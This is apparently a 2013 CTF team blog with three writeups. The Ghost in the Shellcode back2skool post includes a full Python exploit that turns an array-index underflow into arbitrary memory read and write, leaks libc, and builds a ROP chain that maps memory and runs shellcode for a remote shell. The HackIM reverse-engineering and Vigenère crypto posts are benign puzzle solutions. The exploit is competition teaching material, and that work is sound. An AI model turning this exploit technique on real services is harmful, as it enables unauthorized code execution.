Wednesday, February 20, 2013

Ghost in the Shellcode: back2skool Writeup

This challenge ended up having a very cool solution. After reading some other writeups, this could have had a simpler solution, but I thought that ours was cool enough that it was worth a writeup. While we didn't land this exploit against the game server (we couldn't figure out the correct version of libc), we got 100% remote shell reliability against a local server we were running (with ubuntu).

So what did this program do? The purpose of the given binary was to a simple math program, shown below.
    __  ___      __  __   _____
   /  |/  /___ _/ /_/ /_ / ___/___  ______   __ v0.01
  / /|_/ / __ `/ __/ __ \\__ \/ _ \/ ___/ | / /
 / /  / / /_/ / /_/ / / /__/ /  __/ /   | |/ /
/_/  /_/\__,_/\__/_/ /_/____/\___/_/    |___/
===============================================
Welcome to MathServ! The one-stop shop for all your arithmetic needs.
This program was written by a team of fresh CS graduates using only the most
agile of spiraling waterfall development methods, so rest assured there are
no bugs here!

Your current workspace is comprised of a 10-element table initialized as:
{ 0, 1, 2, 3, 4, 5, 6, 7, 8, 9 }

Commands:
        read    Read value from given index in table
        write   Write value to given index in table
        func1   Change operation to addition
        func2   Change operation to multiplication
        math    Perform math operation on table
        exit    Quit and disconnect
This program then, based on the func, would perform manipulations on the data within the given 10-element table. After looking at this in IDA, I was able to determine that the main vulnerability in this program came from the lack of proper bound checking on the array. Neither the read nor write functions checked to see if the input for number to write to was less than 0. Additionally, since the program calculates the real address of the memory spot to write to by doing &values+4*input, we can take advantage of the integer underflow to read or write to anywhere in memory. For example, to overwrite the function pointer of func1/func2, we do the following.
    offset of math_ptr: -2147483634*4 = 56 -> 56/4 = 14 word offset
    This is the correct offset in memory from the values array
So if we write to location -2147483634, then we can write an arbitrary address that the program will call. Unfortunately, there are several hurdles we must still overcome, primarily a non-executable stack and no rwx pages mapped into memory. At this point I wanted to set up a ROP chain that would get me a reverse shell, so I started to play a little ROP golf. Working with libc, I found several useful ROP gadgets that would get me enough space to actually set up a ROP chain.
rop_get_stack_addr = libc_base_addr + 0x0002D71F # offset of mov dword ptr[eax],ecx; ret
xchg_eax_esp = libc_base_addr + 0x0009B019 # offset of xchg eax,esp; ret
mov_ecx_eax = libc_base_addr + 0x000ebe50 # offset of mov eax,ecx; pop; ret
add_eax = libc_base_addr + 0x0011087A # offset of add eax, 0xC; ret
add_esp = libc_base_addr + 0x0007F8F2 # offset of add esp, 0x20; pop; pop; ret
When the program calls the function pointer, eax contains a pointer to our values array. This meant that I could perform the following tasks.
 1. Read an arbitrary stack address so that I knew where the stack was
 2. Write an awesome ROP chain to the stack
 3. Return to the values array, where I set up eax to have the value of a stack address
 4. Return to my ROP chain on the stack
 5. Return to my shellcode in my newly mapped rwx area 
Without further ado, here is my winning python script.
################################################
#   Author: suntzu_II - GitS 2013 back2skool   #
################################################

from SocketInteract import *
import struct, socket, pexpect

def getSignedHex(str_in):
    return hex(((abs(int(str_in)) ^ 0xFFFFFFFF) + 1) & 0xFFFFFFFF).replace('L','')

def getSignedInt(hex_in):
    if hex_in > 0x7FFFFFFF:
        hex_in = -(0xFFFFFFFF-hex_in+1)
    return hex_in

s = socket.socket()
s.connect(('back2skool.2013.ghostintheshellcode.com', 31337))

p = SocketInteract(s)
p.expect('disconnect\n')

# This is an arbitrary function that writes to memory addresses
def writeToMemory(addr, int_data):
    int_data = getSignedInt(int_data)
    p.sendLine('write')
    p.expect('to:\n')
    p.sendLine(str(addr))
    p.expect('write:\n')
    p.sendLine(str(int_data))

# This is an arbitrary function that reads from memory addresses and returns the data
def readFromMemory(addr):
    p.sendLine('read')
    p.expect('from:\n')
    p.sendLine(str(addr))
    p.expect(str(addr) + ': ')
    data,tmp = p.expect('\n')
    return data

# Find these commands with `objdump -T /path/to/libc | grep func`
##################################
### Modify these based on libc ###
##################################
send_off = 0x000f07c0 # libc offset of send
mmap_off = 0x000eb040 # libc offset of mmap
memccpy_off = 0x0007F610 # libc offset of memccpy

print "Determining libc base address"
full_send_addr = int(readFromMemory(-30).replace('\n',''))
libc_base_addr = full_send_addr - send_off
mmap_addr = libc_base_addr + mmap_off
print "Found libc base:",getSignedHex(libc_base_addr),": mmap lives at:",getSignedHex(mmap_addr)

# Find these commands with the command
# `ROPgadget ./back2skool -intel -only eax`
# change the only as a filter
# Note: ROPgadget doesn't show the pops and rets all the time, but they are there
##################################
### Modify these based on libc ###
##################################
rop_get_stack_addr = libc_base_addr + 0x0002D71F # offset of mov dword ptr[eax],ecx; ret
xchg_eax_esp = libc_base_addr + 0x0009B019 # offset of xchg eax,esp; ret
mov_ecx_eax = libc_base_addr + 0x000ebe50 # offset of mov eax,ecx; pop; ret
add_eax = libc_base_addr + 0x0011087A # offset of add eax, 0xC; ret
add_esp = libc_base_addr + 0x0007F8F2 # offset of add esp, 0x20; pop; pop; ret

rwx_area = 0x40000000 # The address that we will map as rwx

print "Getting a stack address through a ROP gadget"
writeToMemory(-2147483634, rop_get_stack_addr)
p.sendLine('math')

stack_addr = int(readFromMemory(0))
stack_addr += 0x54 # The actual address where I am writing

# This is the word offset between the stack and our values array
diff = (stack_addr-0x0804C040)/4

print "Putting ROP chain in memory at",getSignedHex(stack_addr)
print 'Writing mmap call to the stack. mmap:',getSignedHex(mmap_addr)
writeToMemory(diff, mmap_addr)
writeToMemory(diff+1, add_esp) # return addr - add esp 0x20,pop,pop,ret
writeToMemory(diff+2, rwx_area) # buf
writeToMemory(diff+3, 4096) # size
writeToMemory(diff+4, 7) # flags (rwx)
writeToMemory(diff+5, 0x32) # MAP_FIXED | MAP_ANONYMOUS
writeToMemory(diff+6, -1) # fildes
writeToMemory(diff+7, 0) # offset

# dead space
writeToMemory(diff+8,0xdeaddead)

sc = open('sc','rb').read()

memccpy_addr = libc_base_addr + memccpy_off
print 'Writing memccpy call to the stack. memccpy:',getSignedHex(memccpy_addr)
writeToMemory(diff+10, memccpy_addr)
writeToMemory(diff+11, rwx_area) # Return address
writeToMemory(diff+12, rwx_area) # dest
writeToMemory(diff+13, 0x0804C040+(diff+16)*4) # src
writeToMemory(diff+14, 0xFF) # stop char
writeToMemory(diff+15, len(sc)) # len

print 'Writing shellcode to the stack'
i = 0
for i in xrange(len(sc)/4):
    num = ''
    num += hex(ord(sc[i*4+3:i*4+4]))[2:].zfill(2)
    num += hex(ord(sc[i*4+2:i*4+3]))[2:].zfill(2)
    num += hex(ord(sc[i*4+1:i*4+2]))[2:].zfill(2)
    num += hex(ord(sc[i*4:i*4+1]))[2:].zfill(2)
    writeToMemory(diff + 16 + i, int(num,16))

writeToMemory(diff + 17 + i, 0x00000000) # End the shellcode with a null pointer

# This is the pivot through the values array into the stack
writeToMemory(0, mov_ecx_eax)
writeToMemory(1, add_eax)
writeToMemory(2, add_eax)
writeToMemory(3, add_eax)
writeToMemory(4, add_eax)
writeToMemory(5, add_eax)
writeToMemory(6, add_eax)
writeToMemory(7, add_eax)
writeToMemory(8, add_eax)
writeToMemory(9, xchg_eax_esp)

# Overwrite the func ptr to return to the values area
writeToMemory(-2147483634, xchg_eax_esp)

print "Executing ROP chain"
p.sendLine('math')
I didn't get a flag during the competition because I didn't have the correct libc offsets. Barring that, however, it is still a very cool challenge and I had a lot of fun with it.

- suntzu_II

Tuesday, February 5, 2013

HackIM CTF 2013: Reverse Engineering 300

RE 300 was extremely interesting - it was essentially a javascript vm for an invented language. The js file is available here for you to look at if you want, but I will explore the relevant sections of code here.

A couple of variables I will refer to are pc (program counter), opcode (the first digit of any piece of memory), addr (called mailbox in their program and is the other two digits of any piece of memory), acc (the accumulator), and input_counter (the counter to see which digit of input we are examining).

The memory at the beginning of the program is:
var code=[901,340,505,140,305,461,901,722,340,539,723,241,339,540,238,142,342,901,722,901,722,606,000,542,243,243,244,340,830,653,553,140,145,353,546,140,653,000,17,10,000,001,000,400,60,459,41,22,76,76,75,75,37,417,560,140,145,360,547,140,417,567,140,145,367,548,140,417,574,140,145,374,549,140,417,581,140,145,381,550,140,417,588,140,145,388,551,140,417,595,140,145,395,552,140,417,423];
Viewed more clearly as:
0123456789
0901340505140305461901722340539
1723241339540238142342901722901
2722606000542243243244340830653
35531401453535461406530001710
40000010004006045941227676
5757537417560140145360547140
6417567140145367548140417574140
And the rest doesn't really matter
Now, to abstract the exact code, I have come up with some basic assembly-type ideas to represent what the opcodes are doing:
1 = ADD ACC,[ADDR] (Add data at memory location ADDR to accumulator) 
2 = SUB ACC,[ADDR] (Subtract data at ADDR from accumulator)
3 = STACC ADDR (Store accumulator in ADDR)
5 = LDACC [ADDR] (Load accumulator with data from ADDR)
6 = JMP ADDR (Change the pc to ADDR)
7 = BRZ ADDR (Branch if zero to ADDR)
8 = BRGEZ ADDR (Branch if greater than or equal to zero to ADDR)
9 = INPUT (stored in accumulator) or OUTPUT (Dependent on ADDR)
else = DIE
Now we can start analyzing what the program does. The first important string of commands is 901, 340, 505, 140, 305, 461.
901: INPUT 
340: STACC 40 (Stores the input at memory 40)
505: LDACC [5] (Loads the accumulator with the contents of addr=5, 461)
140: ADD ACC, [40] (Address 40 becomes a temporary variable of sorts. Think of it as RAM.
     This command adds the contents of memory 40 to the accumulator, 461 + input)
305: STACC 5 (Stores 461+input in memory 5)

461+input: This command has now changed based on our input. Since there are no
opcodes that begin with 4, we know we must input a value that makes this be greater
than 500. However, looking ahead to the next command (a 901), we know that the value
of the accumulator will be ignored anyway. So any ASCII character will do as the
first character.
Now comes the interesting part. The next string of commands is 901, 722, 340, 539, 723, 241, 339, 540, 238, 142, 342, 901, 722, 901, 722, 606.
901: INPUT  
722: BRZ 22 (If the input is zero, branch to addr 22 which is a zero. This is essentially an exit() command)
340: STACC 40 (Store the input in address memory 40)

This next part is essentially a loop counter that gets a number,
checks if it is zero, and decrement. Think of it as for (int i = 10; i > 0; i--) type code. 539: LDACC [39] (Load accumulator with the contents of addr 39. This is a loop counter that counts down from 10)
723: BRZ 23 (If the value in accumulator is 0, branch to addr 23. This will happen after looping 10 times)
241: SUB ACC, [41] (Addr 41 has a value of 1, so this is essentially a decrement of the accumulator)
339: STACC 39 (Stores the decremented value back into memory)

This next part is summing the ASCII values of inputted characters
and storing the result in memory location 42. 540: LDACC [40] (Load accumulator with input we stored earlier)
238: SUB ACC, [38] (Subtract 17 every time)
142: ADD ACC, [42] (Add the previous sum into the accumulator)
342: STACC 42 (Store the sum into it's memory location)
901: INPUT (This input is ignored)
722: BRZ 22 (DIE)
901: INPUT (This input is ignored)
722: BRZ 22 (DIE)
606: JMP 6 (Jump back to the beginning of this section)
After analyzing this section of code, we know that the program sums the first of every set of three inputs (and subtracts 17) 10 times and stores the result somewhere. So the result is going to be sum = input * 10 - 170. With that information in mind, we look start ADDR=23 where we jump to once the loop counter reaches 0. The string of commands is 542, 243, 243, 244, 340, 830, 653, 553, 140, 145, 353, 546, 140, 653.
542: LDACC [42]  (This loads the sum into the accumulator) 
243: SUB ACC,[43] (Subtract 400 from the sum)
243: SUB ACC,[43] (Subtract 400 from the sum)
244: SUB ACC,[44] (Subtract 60 from the sum)
340: STACC 40 (Store the result from the subtractions in addr 40)
830: BRGEQZ 30 (Branch if the result is greater or equal to zero. THIS MUST HAPPEN.)
653: JMP 53 (This will die at this point. The instruction at 53 does not work)
553: LDACC [53] (Load the accumulator with 417)
140: ADD ACC,[40] (Add the result of the subtractions to the accumulator)
145: ADD ACC,[45] (Add 459 to the accumulator. We now have 876+result in the accumulator)
353: STACC 53 (Store 876+result in the addr 53)
546: LDACC [46] (Load accumulator with 41)
140: ADD ACC,[40] (Add the remainder to the accumulator)
653: JMP 53 (Jump to addr 53, which now contains 876+result)
So what just happened? The sum of every third character (minus 170) needs to be greater than 860, else this chunk of code will die. Also, 876+result is going to be a piece of code that we run, so what should we put there? Well, knowing that the code 902 outputs data (and no 902 exists in memory at the beginning of this program), I guessed that we need to put 902 in that spot. So the result needs to be 26 to force this piece of data to be 902. An ASCII value that will make this happen is somewhere around the letter i. Using the built-in javascript debugger in Chrome, the string I ended up using to get 902 was aiaaiaaiaaiaajaajaajaajaajaajaajaa, which immediately spit out the key "C0ffee?".

-- suntzu_II

Monday, February 4, 2013

HackIM CTF 2013: Crypto 300

Many of the crypto challenges were more puzzles than mathematical cryptography. This challenge was no different and is shown below
Bellaso Falls in Love Again 300 pts 

CipherText: Gntgc mey fhhsc mzc ugkt 20 wqnle oy evfwfvkcrc, max fhhsc mzc ugkt mzr sqak od updrxxtlor niegtw jaary - Bppw Jcxlbaki
At first glance, we can pick up on the fact that it appears to be a quote of some sort, and it looks like it operates only on letters (the number 20 doesn't appear to be a word). But I didn't really know where to start after that so I Googled "Bellaso Cryptography" and started reading. The wikipedia page credits Giovan Battista Bellaso with using/creating autokey/vigenere-type ciphers. A brief explanation of Vigenere-Type Ciphers:
Plaintext:this is my plaintext
Key:bobb ob bo bbobbobbo <-- The word bob repeated over the length of the plaintext
Ciphertext:uvjt wt nm qmojohfyh <-- Simply add the alphabet index values to get the output
I was still a little lost about where to go from here so I kept reading Google results until I stumbled across a very interesting article on one of Bellaso's Ciphers here. Apparently, Bellaso release a series of challenges to his readers and the first one did not get solved until just a few years ago, and he did it by finding a series of repeating letters, which helped him get the key length. I decided to try that as well to see if I could find a guess of a key-length. There is quite a glaring one that I couldn't believe I had not seen.
Gntgc mey fhhsc mzc ugkt 20 wqnle oy evfwfvkcrc, max fhhsc mzc ugkt mzr sqak od updrxxtlor niegtw jaary - Bppw Jcxlbaki
The chances of this 12 character string not being the same plaintext letters was very small, so we assume that the key lines up exactly with this string. Since we know that the beginning of the key must line up with the beginning of each "fhhsc" string, the key must evenly divide into the number of letters between the beginning of each of those. There are 32 characters between the beginning of the two strings, so key lengths of 2, 4, 8, 16,and 32 are possible. At this point, I found an online tool that would guess keys based on a vigenere cipher and try to decrypt the cipher text, but you have to give it a key length. I started with a keylength of 4, 8, and finally 16 before I got something promising. With a keylength of 16, the tool guessed a key and plaintext of
Key: NCGPYINUBTTOOUIY 
Tlnre ere eooeo sre heee 20 yiard vf qhlohiiwce, end eooeo sre heee ore yphr ap ahfevrenge thlnfi pscew - Varo Wiwsimwo
I thought that the first 8 letters looked kind of like "There are" so I used another online tool to start refining my key. After I made the key such that the first two words were "There are," I had the below plaintext and key.
Key: NGPPYMNUBTTOOUIY 
Plaintext: There are eooeo sre have 20 yeard vf qhlohience, and eooeo sre have one yphr ap ahferience thlnfi psces - Mark Wiwsimwo
You can see that every 8 characters, we have successfully decrypted the text to make the readable English. We also have a first name of the author, so we are definitely on the right track. Now I looked at the "20 yeard vf" which should probably be "20 years of". After some more fiddling, we lock two more characters of the decryption key.
Key: NGPPYMNUMATOOUIY 
Plaintext: There are thoeo sre have 20 years of qhlohience, and thoeo sre have one year ap ahferience twenfi psces - Mark Willimwo
We have some more plaintext now and look at the word "thoeo" which is probably supposed to be "those". Modified the key and we now have this.
Key: NGPPYMNUMATAYUIY 
Plaintext: There are those sre have 20 years of exlohience, and those sre have one year of ahferience twenty psces - Mark Williamo
At this point I guessed what the rest of the quote was and got the key to spit it out to me.
Key: NGPPYMNUMATAYQSO 
Plaintext: There are those who have 20 years of experience, and those who have one year of experience twenty times - Mark Williams
The answer was the full plaintext.

-- suntzu_II

HackIM CTF 2013

We are certainly excited to kick off the CTF calendar for 2013! HackIM (as far as we can tell) is the first CTF this year that has been publicly available, and it was a good competition. The challenges covered the following categories: Reverse Engineering, Cryptography, Trivia, Web, Forensics, and Log Analysis. We will be posting writeups on several of the challenges over the next few days as we find time for it. Thanks for the great CTF Nullcon!